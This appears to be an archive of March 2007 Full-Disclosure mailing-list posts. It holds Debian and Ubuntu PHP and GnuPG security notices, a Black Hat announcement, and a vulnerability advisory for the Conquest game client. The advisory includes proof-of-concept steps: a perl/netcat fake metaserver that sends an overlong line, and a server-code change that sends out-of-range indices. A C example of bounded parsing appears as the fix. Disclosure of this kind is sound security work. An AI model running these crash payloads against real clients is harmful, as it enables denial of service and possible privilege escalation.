Size/MD5 checksum: 1709576 c521d1761395fa41e785906cd052a240 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_s390.deb Size/MD5 checksum: 1708618 cbea3ff2f1f8b42c91f8d1ebe6f295a1 http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_s390.deb Size/MD5 checksum: 3360294 a642ef581d1decdd6b330f2ca62aa3a8 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_s390.deb Size/MD5 checksum: 1687438 0a16abfb5e945795b598e06fe78821bd http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_s390.deb Size/MD5 checksum: 168202 088f381bf8f67c76e6a636b1a7420709 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_s390.deb Size/MD5 checksum: 17842 6f628c4ba64fe7c3e6d1958d8887a032 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_s390.deb Size/MD5 checksum: 325188 84155d21cc204dd029cb6fe724fd700e http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_s390.deb Size/MD5 checksum: 41124 f159880550b5c238b0f9cd357763e120 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_s390.deb Size/MD5 
checksum: 33564 560a9717ec712e71a9608ee808017f93 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_s390.deb Size/MD5 checksum: 37530 58332a689abe020d696accb2c4413bdc http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_s390.deb Size/MD5 checksum: 21410 8266344d677b30c00ee0575185808c7d http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_s390.deb Size/MD5 checksum: 17732 1d5a9cdcc554b886836392abacafb37a http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_s390.deb Size/MD5 checksum: 8394 bf5bfd48a6955ed04cf5eb43c0dbed80 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_s390.deb Size/MD5 checksum: 22938 558f6a81404ef0097f4d47ef41067acd http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_s390.deb Size/MD5 checksum: 28874 63b1580d76b438dfe3c6150fca0c983c http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_s390.deb Size/MD5 checksum: 8048 fb1993cc4170134b46d0a68496971992 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_s390.deb Size/MD5 checksum: 13894 eeee528a1872d8fd80f92c6459950216 http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_s390.deb Size/MD5 checksum: 22276 ef4cc0b299f757599e7edd178cfbfa95 http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_s390.deb Size/MD5 checksum: 17300 c2d98a377eff47a1fa6376d491378007 Sun Sparc architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_sparc.deb Size/MD5 checksum: 1623810 c451cd4693f5a69534681b1eba46e29d http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_sparc.deb Size/MD5 checksum: 1620886 6f450acb1570c2917c92af4e2ee3462b http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_sparc.deb Size/MD5 checksum: 3197912 c01cbc381a760f7439f8c8b24a8ee717 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_sparc.deb 
Size/MD5 checksum: 1606454 0f3be5c22bb512308e0c668b06e7f25b http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_sparc.deb Size/MD5 checksum: 168222 d4a0310401f3092a2ea57880bed9911d http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_sparc.deb Size/MD5 checksum: 18074 160821e02197baf3364906d17eabaa37 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_sparc.deb Size/MD5 checksum: 325276 b0c1759a579859033b410d34bf443162 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_sparc.deb Size/MD5 checksum: 36488 cb0f7a642bcc12fdcde900b179ad197f http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_sparc.deb Size/MD5 checksum: 31948 c31211a42a127e283cf05eea2acb3782 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_sparc.deb Size/MD5 checksum: 36246 ded59dffa2579d4f3f91be5bc465812e http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_sparc.deb Size/MD5 checksum: 19278 d852fc1b8146be87d789d46f3fd9531a http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_sparc.deb Size/MD5 checksum: 17488 c25a9f3959ad71717f22139ee5cc3964 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_sparc.deb Size/MD5 checksum: 7870 54ef2d007c15936eff7a0968c1bb8411 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_sparc.deb Size/MD5 checksum: 20672 3aa6f646c2d48e12f274844d882b4cb3 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_sparc.deb Size/MD5 checksum: 26540 db50bace36223a5fb3165012da864279 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_sparc.deb Size/MD5 checksum: 7594 a16c41b7273adaf2b72e2cd66a29d856 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_sparc.deb Size/MD5 checksum: 12846 5f44cba16d1c910b0336c221ab3db31b http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_sparc.deb Size/MD5 checksum: 20850 
f84c554b5e0c31a276444953acdf0d5d
  http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_sparc.deb
    Size/MD5 checksum:    15866 56d9a2ad4d2d94150b7be7deefc6fbd0

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF7zanXm3vHE4uyloRAr0xAKCLwQ7ji6kxWczRj+WZRIEknn3R4QCgxaVz
ShT4FvG6b6xvbngTqwEvkkU=
=FElM
-----END PGP SIGNATURE-----


From aluigi at autistici.org Wed Mar 7 23:40:10 2007
From: aluigi at autistici.org (Luigi Auriemma)
Date: Thu, 8 Mar 2007 00:40:10 +0100
Subject: [Full-disclosure] Buffer-overflow in Conquest client 8.2a (svn 691)
Message-ID: <20070308004010.60ed5b37.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  Conquest
              http://www.radscan.com/conquest.html
Versions:     <= 8.2a (svn 691)
Platforms:    *nix and Windows
Bugs:         A] buffer-overflow in metaGetServerList()
              B] memory corruption through SP_CLIENTSTAT
Exploitation: local and remote, versus the client
Date:         07 Mar 2007
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Conquest is a multi-player game which can be considered the predecessor
of Netrek (http://www.netrek.org).

Note that on some distros (like Debian) the conquest binaries are marked
setgid for the conquest group.
#######################################################################

=======
2) Bugs
=======

-----------------------------------------
A] buffer-overflow in metaGetServerList()
-----------------------------------------

The Conquest client has an option (-m) for querying the metaserver
conquest.radscan.com, on which the servers currently online are listed,
but the program allows the use of alternative metaservers too.

The function which reads the data received from the metaserver is
affected by a stack-based buffer-overflow which happens during the
storing of the line containing the server's entry in a buffer (buf) of
1024 bytes.

The best exploitation of this bug is for local users who want to
escalate their privileges gaining the conquest group.

At the same time there is also another buffer-overflow which affects the
static servers buffer limited to 1000 (META_MAXSERVERS) max servers;
anyway it doesn't seem possible to fully exploit this second bug for
code execution.

from meta.c:

int metaGetServerList(char *remotehost, metaSRec_t **srvlist)
{
  static metaSRec_t servers[META_MAXSERVERS];
  ...
  char buf[1024];               /* server buffer */
  ...
  off = 0;
  while (read(s, &c, 1) > 0)
    {
      if (c != '\n')
        {
          buf[off++] = c;
        }
      else
        {                       /* we got one */
          buf[off] = 0;
          /* convert to a metaSRec_t */
          if (str2srec(&servers[nums], buf))
            nums++;
  ...

------------------------------------------
B] memory corruption through SP_CLIENTSTAT
------------------------------------------

SP_CLIENTSTAT is a type of packet used by the server for sending some
information about the ships and the users.
In this packet are located two numbers which are not correctly sanitized by the client:

- unum: 16 bit, used for the Users structure
- snum: 8 bit, used for the Ships structure

Both structures are placed in the cBasePtr buffer allocated at runtime with 262144 (SIZEOF_COMMONBLOCK) bytes of memory: Users at offset 388 where each element has a size of 264 bytes (total 132000) and Ships at offset 141040 with 1124 bytes per element (total 23604).

In both cases it is possible to write one or more bytes in some zones of memory outside the original structures and the cBasePtr buffer, but I think that code execution is practically impossible...

The following are the instructions used for handling the SP_CLIENTSTAT packet, where the writing of the scstat->team value sent by the server is easily visible:

        case SP_CLIENTSTAT:
          scstat = (spClientStat_t *)buf;
          Context.snum = scstat->snum;
          Context.unum = (int)ntohs(scstat->unum);
          Ships[Context.snum].team = scstat->team;
          clientFlags = scstat->flags;
          break;

#######################################################################

===========
3) The Code
===========

A]
- launch a fake metaserver which sends more than 1024 chars:

    perl -e 'print "a"x1200' | nc -l -p 1700 -v -v -n

- launch the client specifying the alternate metaserver:

    conquest -m -M 127.0.0.1

- interrupt the fake metaserver; conquest should have crashed trying to execute the code at offset 0x61616161

B]
- get the source code of the server, modify the scstat.snum or scstat.unum value in the sendClientStat function located in server.c, giving them values like 0xff (for snum) or htons(0xffff) (for unum) depending on which of the two bugs you want to test:

      scstat.type = SP_CLIENTSTAT;
      scstat.flags = flags;
-     scstat.snum = snum;
+     scstat.snum = 0xff;
      scstat.team = team;
      scstat.unum = htons(unum);
      scstat.esystem = esystem;

- compile the new server, launch it and join with a client, which will crash after the login
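The two checks the advisory says the client lacks, as an added example (editor's code, not Conquest's and not part of this advisory): a bounded version of the metaGetServerList() read loop, fed from memory instead of a socket, and an index check for the snum/unum values carried by SP_CLIENTSTAT. metaSRec_t, str2srec_stub(), the placeholder host names and the element counts derived from the advisory's byte sizes are assumptions.

```c
#include <stddef.h>
#include <string.h>

#define META_MAXSERVERS 1000   /* size of the static servers[] array (advisory) */
#define META_LINE_BUF   1024   /* size of buf[] in metaGetServerList() (advisory) */

/* Element counts implied by the advisory's byte sizes; derived here, not read
   from Conquest's headers. */
#define USERS_COUNT (132000 / 264)   /* 500 Users entries */
#define SHIPS_COUNT (23604 / 1124)   /* 21 Ships entries */

/* Hypothetical stand-in for metaSRec_t: the real struct holds many parsed
   fields, this example only keeps the raw line. */
typedef struct { char line[META_LINE_BUF]; } metaSRec_t;

/* Hypothetical stand-in for str2srec(): accept a non-empty line with the
   host:port shape of a metaserver entry. The bounds checks are the point. */
static int str2srec_stub(metaSRec_t *rec, const char *line)
{
    if (line[0] == '\0' || strchr(line, ':') == NULL)
        return 0;
    strncpy(rec->line, line, sizeof rec->line - 1);
    rec->line[sizeof rec->line - 1] = '\0';
    return 1;
}

typedef struct {
    size_t servers;       /* records stored in servers[] */
    size_t dropped_long;  /* lines that would have overrun buf[], discarded whole */
    size_t dropped_full;  /* lines ignored because servers[] was already full */
} meta_parse_stats_t;

/* Bounded rewrite of the metaGetServerList() read loop. `data` stands in for
   the bytes the client would read() one at a time from the metaserver socket.
   Two checks the original lacks: off never reaches sizeof buf, and the record
   count never reaches maxservers. */
meta_parse_stats_t meta_parse_bounded(const unsigned char *data, size_t len,
                                      metaSRec_t *servers, size_t maxservers)
{
    meta_parse_stats_t st = {0, 0, 0};
    char buf[META_LINE_BUF];
    size_t off = 0;
    int overlong = 0;

    for (size_t i = 0; i < len; i++) {
        unsigned char c = data[i];
        if (c != '\n') {
            if (overlong)
                continue;                    /* skip the rest of a bad line */
            if (off >= sizeof buf - 1) {     /* keep room for the NUL */
                overlong = 1;
                continue;
            }
            buf[off++] = (char)c;
            continue;
        }
        if (overlong) {
            st.dropped_long++;
        } else if (st.servers >= maxservers) {
            st.dropped_full++;
        } else {
            buf[off] = '\0';
            if (str2srec_stub(&servers[st.servers], buf))
                st.servers++;
        }
        off = 0;
        overlong = 0;
    }
    /* a trailing fragment with no '\n' is never converted, as in the original */
    return st;
}

/* Same idea for SP_CLIENTSTAT: snum/unum from the wire must index a real
   Ships[]/Users[] element before the client writes through them. */
int clientstat_indices_ok(unsigned snum, unsigned unum)
{
    return snum < SHIPS_COUNT && unum < USERS_COUNT;
}

/* Constructed metaserver reply: a good entry, the 1200-byte line from the
   advisory's PoC, another good entry, then a fragment with no newline. */
meta_parse_stats_t meta_demo(size_t maxservers)
{
    static metaSRec_t servers[META_MAXSERVERS];
    static unsigned char data[2048];
    const char *good1 = "meta-a.example.invalid:1701\n";   /* placeholder host */
    const char *good2 = "meta-b.example.invalid:1701\n";   /* placeholder host */
    size_t n = 0;

    memcpy(data + n, good1, strlen(good1)); n += strlen(good1);
    memset(data + n, 'a', 1200);            n += 1200;
    data[n++] = '\n';
    memcpy(data + n, good2, strlen(good2)); n += strlen(good2);
    memcpy(data + n, "tail", 4);            n += 4;
    return meta_parse_bounded(data, n, servers, maxservers);
}
```

With the full META_MAXSERVERS limit the constructed reply yields two stored records and one dropped over-long line; with maxservers set to 1 the second good entry is counted as dropped_full instead of being written past the array.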
#######################################################################

======
4) Fix
======

SVN 693

#######################################################################

---
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org

From jmoss at blackhat.com Thu Mar 8 03:24:17 2007
From: jmoss at blackhat.com (Jeff Moss)
Date: Wed, 07 Mar 2007 19:24:17 -0800
Subject: [Full-disclosure] Black Hat USA CFP Now Open!
Message-ID: <200703080327.l283RYEo011051@colossus.datamerica.com>

Full Disclosure readers,

I wanted to make some quick Black Hat related announcements.

The Call For Papers for Black Hat USA is now open. This is the main event, and this year we have even more space: we have expanded from 9 tracks to 11, we will be introducing Break Out sessions, and the Deep Knowledge track will now span both days. We are working to expand the depth and breadth of content, so if you have something up your sleeve you want to present, check out the CFP:
http://www.blackhat.com/html/bh-usa-07/bh-usa-07-cfp.html

Black Hat USA 2007 Training Classes now open. Please see the following link for a complete list of classes being offered this year.
http://www.blackhat.com/html/bh-usa-07/train-bh-usa-07-index.html

Highlights include over 35 training classes including two new four-day sessions. Below is a sample of what to expect:

- The nuts and bolts of the Metasploit Framework: Metasploit 3.0 Internals by Matt Miller, aka skape.
- Web Application (In)security by NGS Software. If you are concerned with the security of web applications and the insecurity they introduce to your back end information systems, this is the workshop for you.
- TCP/IP Weapons School: Black Hat Edition by Richard Bejtlich, TaoSecurity. Learn how networks can be abused and subverted, while analyzing the attacks, methods, and traffic that make it happen.
- Ultimate Hacking: Wireless Edition by Foundstone. Knowledge is power and you do not want the hackers to know more about your wireless networks than you do.
- Hands-On Hardware Hacking and Reverse Engineering Techniques: Black Hat Edition by Joe Grand. This course is the first of its kind and focuses entirely on hardware hacking.
- ROOTKIT: Advanced 2nd Generation Digital Weaponry by Greg Hoglund and Jamie Butler. Advanced class developed and taught by the creators of rootkit.com
- Advanced Malware Deobfuscation by Jason Geffner & Scott Lambert. No Source? No Symbols? No Problem.
- Hacking by Numbers: Combat Grading by SensePost. Advanced level. The world's first objective technical grading system for hackers and penetration testers.

Black Hat Briefings and Trainings USA 2007:
http://www.blackhat.com/html/bh-usa-07/bh-usa-07-index.html

Registration on-line at:
http://www.blackhat.com/html/bh-registration/bh-registration.html#USA

Hotel Reservations now open.
http://www.blackhat.com/html/bh-usa-07/bh-usa-07-venue.html

RSS: http://www.blackhat.com/BlackHatRSS.xml

Black Hat Europe:

Black Hat Europe 2007 Hotel rate extended. We have extended the Group Rate at the Movenpick in Amsterdam until the end of this week (March 9). If you plan to stay at the hotel, now is the last minute for you to reserve at the Black Hat conference rate, currently EUR 145,00 per night plus taxes.
http://www.blackhat.com/html/bh-europe-07/bh-eu-07-venue.html

Thank you,
Jeff Moss

From kees at ubuntu.com Thu Mar 8 07:04:49 2007
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 7 Mar 2007 23:04:49 -0800
Subject: [Full-disclosure] [USN-432-1] GnuPG vulnerability
Message-ID: <20070308070449.GF20498@outflux.net>

===========================================================
Ubuntu Security Notice USN-432-1             March 08, 2007
gnupg vulnerability
CVE-2007-1263
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  gnupg                                    1.4.1-1ubuntu1.7

Ubuntu 6.06 LTS:
  gnupg                                    1.4.2.2-1ubuntu2.5

Ubuntu 6.10:
  gnupg                                    1.4.3-2ubuntu3.3

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Gerardo Richarte from Core Security Technologies discovered that when gnupg is used without --status-fd, there is no way to distinguish initial unsigned messages from a following signed message. An attacker could inject an unsigned message, which could fool the user into thinking the message was entirely signed by the original sender.

Updated packages for Ubuntu 5.10:
Updated packages for Ubuntu 6.06 LTS:
Updated packages for Ubuntu 6.10:
From kees at ubuntu.com Thu Mar 8 07:04:33 2007
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 7 Mar 2007 23:04:33 -0800
Subject: [Full-disclosure] [USN-424-2] PHP regression
Message-ID: <20070308070433.GE20498@outflux.net>

===========================================================
Ubuntu Security Notice USN-424-2             March 08, 2007
php5 regression
https://launchpad.net/bugs/87481
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 5.10:
  libapache2-mod-php5                      5.0.5-2ubuntu1.8
  php5-cgi                                 5.0.5-2ubuntu1.8
  php5-cli                                 5.0.5-2ubuntu1.8
  php5-common                              5.0.5-2ubuntu1.8

Ubuntu 6.06 LTS:
  libapache2-mod-php5                      5.1.2-1ubuntu3.6
  php5-cgi                                 5.1.2-1ubuntu3.6
  php5-cli                                 5.1.2-1ubuntu3.6
  php5-common                              5.1.2-1ubuntu3.6

Ubuntu 6.10:
  libapache2-mod-php5                      5.1.6-1ubuntu2.3
  php5-cgi                                 5.1.6-1ubuntu2.3
  php5-cli                                 5.1.6-1ubuntu2.3
  php5-common                              5.1.6-1ubuntu2.3

After a standard system upgrade you need to restart Apache or reboot your computer to effect the necessary changes.

Details follow:

USN-424-1 fixed vulnerabilities in PHP. However, some upstream changes were not included, which caused errors in the stream filters. This update fixes the problem. We apologize for the inconvenience.

Original advisory details:

 Multiple buffer overflows have been discovered in various PHP modules. If a PHP application processes untrusted data with functions of the session or zip module, or various string functions, a remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0906)

 The sapi_header_op() function had a buffer underflow that could be exploited to crash the PHP interpreter. (CVE-2007-0907)

 The wddx unserialization handler did not correctly check for some buffer boundaries and had an uninitialized variable. By unserializing untrusted data, this could be exploited to expose memory regions that were not meant to be accessible. Depending on the PHP application this could lead to disclosure of potentially sensitive information. (CVE-2007-0908)

 On 64 bit systems (the amd64 and sparc platforms), various print functions and the odbc_result_all() function were susceptible to a format string vulnerability. A remote attacker could exploit this to execute arbitrary code with the privileges of the web server.
 (CVE-2007-0909)

 Under certain circumstances it was possible to overwrite superglobal variables (like the HTTP GET/POST arrays) with crafted session data. (CVE-2007-0910)

 When unserializing untrusted data on 64-bit platforms the zend_hash_init() function could be forced to enter an infinite loop, consuming CPU resources, for a limited length of time, until the script timeout alarm aborts the script. (CVE-2007-0988)

Updated packages for Ubuntu 5.10:
Updated packages for Ubuntu 6.06 LTS:
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 40614 5612be92d7eb453d29d95ace7b1922ab http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 8106 296bdae0fa560357e0cba601471109f8 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 14052 b1c3de4029225a19ed2c7ff418adfb8c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 25964 303e083d5f560ede8d2132c786077f6e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 20788 2cd17d476be3cda706eb3fa05c0bc313 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 38028 ce39cd1911b8cd146ff2328b168cbb25 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.6_sparc.deb Size/MD5: 15082 d441d6235abe88990dc11384da200487 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.6-1ubuntu2.3.diff.gz Size/MD5: 107479 7d180d00bc62da71934cdb1e13ecf817 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.6-1ubuntu2.3.dsc Size/MD5: 1766 21ed2c34115f447ec0bcad613cc45ecb http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.6.orig.tar.gz Size/MD5: 8187896 04d6166552289eaeff771f5ec953b065 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.1.6-1ubuntu2.3_all.deb Size/MD5: 305694 18df7f5881e899b6afc68acd45e282a5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.6-1ubuntu2.3_all.deb Size/MD5: 1070 450e72489f77db90c8371455fac31291 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 2429170 26e877f10606e3e3dee0ad5f3bc95655 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 
4722618 03b4be3c2c6313727bd819cf69451021 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 2384804 4cf63801aa4a75c9861ad3ff2f003f1a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 139898 80f4ececf9622e6a6c2923aa7f443363 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 25826 e7d183bf2c9c3f1bc430ec0d22c028d7 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 308460 47c093a7a81e3faab7b75a52260f9017 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 37194 e4978c80286a921ff62753d0171dcd75 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 22164 513f34aeb27901744e116afc21f5a2f2 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 8874 037dad99aba32c172c273d64e1b2e92f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 25346 ac078728a7c3750f5f3faf87348ccf6b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 44268 5bb5d2b7ec8fe51b3b96cb82089b721e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 30272 8675e39c6796bba43e335b569a1ddf79 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 44304 e3bac51448355e4797ccf9be593d9e97 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 8354 8634aa0116340a3897725ad48e5e1550 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 15542 c81a3772e4e9e82f30b07977c754d25e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 29326 411925fdcf88c977c10257ccdee9b4d8 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 22878 fbb15b6b5c4852e359e96e347de7f68c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 42690 4eca58e4dddc8116bc8df77f2f45f97e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.6-1ubuntu2.3_amd64.deb Size/MD5: 16474 79e46497183d1eebd6ad3b893f79a6a7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 2318230 179c500c8e7c2f87bd338d7be97a0848 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 4578968 9126f89416a242eed33c1a5bceac740b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 2304466 b8568170f90df1dc067dbf12a7ffc851 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 139900 69056528d18c8d4971a5b00903c603e0 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 24574 4259db29f6ae50ebc24f510baf869397 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 308482 58073a11cea4f900d9ecfea2d69c1f19 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 34086 084b942c6123b030565c601f422bb7a6 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 20324 db6a087587dc2cae9f265ccb404a871f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 8630 5f55e30cf76abe7e9eb779ef60d021e2 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 23106 3120306fae51697681de099a7285bc48 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 39494 0c3bd231f67301d82995ea83a6b7097b 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 28402 074a55853f9af1aa966a6fcc2c938e3f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 41674 7742074b4cc576052307c36eb400e0e5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 8180 a8fea8b773d7e935262d9b6d10be5f35 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 14628 0034283b12136fd03bc73b2d1ef28e54 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 26432 09d9918a42cc93a7b99f962280f91319 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 21488 a7e4db77f6893d1407fa9ccb414b5ab9 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 39810 a83ff00d0a28123fe0ff932da22d4a92 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.6-1ubuntu2.3_i386.deb Size/MD5: 15492 31622fa630e0e16777d0345d54c33282 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 2449340 90309539e6bd9d3836bed3f2ad6d542a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 4774572 3962544cb575538a14af1172f799662c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 2402654 63be9437c15207b0d0f4309393041ebd http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 139896 49041329cf25fa6280aa33f0145f1232 